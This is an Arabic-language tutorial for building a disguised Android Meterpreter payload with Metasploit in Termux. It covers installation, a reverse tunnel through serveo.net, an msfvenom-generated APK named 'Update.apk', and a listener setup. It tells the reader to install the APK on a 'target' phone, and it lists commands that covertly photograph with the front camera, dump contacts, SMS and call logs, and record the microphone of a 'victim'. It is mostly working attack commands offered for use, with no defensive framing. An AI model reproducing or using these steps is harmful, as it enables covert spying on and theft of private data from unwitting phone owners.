عمل بايلود للاندرويد باستخدام Termux

 تثبيت METASPLOIT على TERMUX

اولا يجب ثتبيت الميتاسبلويت على جهازك الاندرويد قم بتحميل termux من play store في حال لا تمتلكه 

قم بفتح termux وادخل الاوامر التالية :

apt update && apt upgrade

pkg install unstable-repo

pkg install metasploit

ملاحظة: - ستنشئ طريقة التثبيت هذه اختصارًا تلقائيًا حتى تتمكن من فتحها في أي مكان (لا حاجة للذهاب إلى المسار في كل مرة عندما تحتاج إليها).

المتطلبات التي تحتاجه :-

اندرويد اصدار 5.0 او اعلى

turmux تحميله من playstore

ميتاسبلويت الشرح في الاعلى لتثبيته

انترنت

يجب السماح لـ TermuX باستخدام الذاكرة الخارجية (لهذا أدخل فقط هذا الأمر مرة واحدة فقط: "termux-setup-storage") 

تحميل تطبيق MiXplorer من UpToDown

تحميل تطبيق MiX Signer من البلاي ستور او من هنا apkmirror 

عمل بايلود باستخدام الميتاسبلويت

1- يجب فتح منفذ (Port Forwarding) 

لفعل ذلك ثبت OpenSSH باستخدام الامر :

pkg install openssh

ثم 

ssh -R 4447:localhost:4447 serveo.net

المنفد 4447 يمكن تغييره مع تغير المنفذ في الامر الذي بالاسفل او تركه كما هو

2- انشاء البايلود باستخدام الامر :

msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4447 R > storage/downloads/Update.apk 

 

3- اعدادت الميتاسبلويت في turmux باستخدام الاوامر التالية :

msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST localhost

set LPORT 4447

exploit -j -z 

قم بتثبيت البايلود التي تم إنشاؤها apk في الهاتف المحمول المستهدف. 
لتتفاعل مع الهاتف المستهدف اكتب الامر : sessions -i 1

تم الاختراق بنجاح بجهاز الضحية



بعض الأوامر :

أخذ لقطة من الكاميرا الأمامية

webcam_snap -i 2 -p storage/downloads/X-Stealth-Snapshot-F.jpg

جلب جميع جهات الاتصال 

dump_contacts -o storage/downloads/X-Contacts.txt

سيتم حفظ جهات الاتصال في: (الذاكرة ) -> التنزيلات -> X-Contacts.txt

إحضار جميع الرسائل القصيرة

dump_sms -o storage/downloads/X-SMS.txt 

جلب سجل المكالمات

dump_calllog -o storage/downloads/X-CallLog.txt

التجسس عبر الميكروفون

record_mic -d 10 -f storage/downloads/X-Spy-Record.mp3